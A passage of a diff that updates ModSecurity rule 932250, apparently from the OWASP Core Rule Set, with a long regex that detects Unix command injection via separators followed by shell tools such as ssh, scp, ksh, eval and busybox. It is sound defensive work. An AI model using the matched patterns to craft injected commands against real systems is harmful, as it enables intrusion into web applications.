@@ -492,7 +498,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \{[0-9 # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 932250 # -SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?
:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[\s\x0b&\),<>\|]|$).*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:7[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[arx][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?|(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[89][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?9|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|d[\
"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?f|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|q[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|f[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[dg]|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s|q)|[kz][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|k[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z)|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|m[\"'\)\[
\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|(?:s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?h|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n)|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:3[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|c)|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|z)|y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|l[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:4[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?))(?:[\s\x0b&\),<>\|]|$).*|a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?-[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[&\),<>\|]|$){1,10}|(?:[\-\.0-9A-Z_a-z][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?){1,10}(?:[\s\x0b&\),<>\|\}]|$){1,10})|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{
]*)?\x5c?j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*)|g[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[&\),<>\|]|$){1,10}|(?:[\-\.0-9A-Z_a-z][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?){1,10}(?:[\s\x0b&\),<>\|\}]|$){1,10})|(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|[hr][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*))" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]
*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|].*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:7[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z[\"'\)\[\x5c]*(?:(?:(?:\|\|
|&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[arx][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?|(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[89][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?9|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?f|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|q[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|f[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:g|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s|q)|[kz][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)
[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|(?:k[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?g|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z)|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|(?:s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?h|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n)|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:3[\"'\)\[\x5c]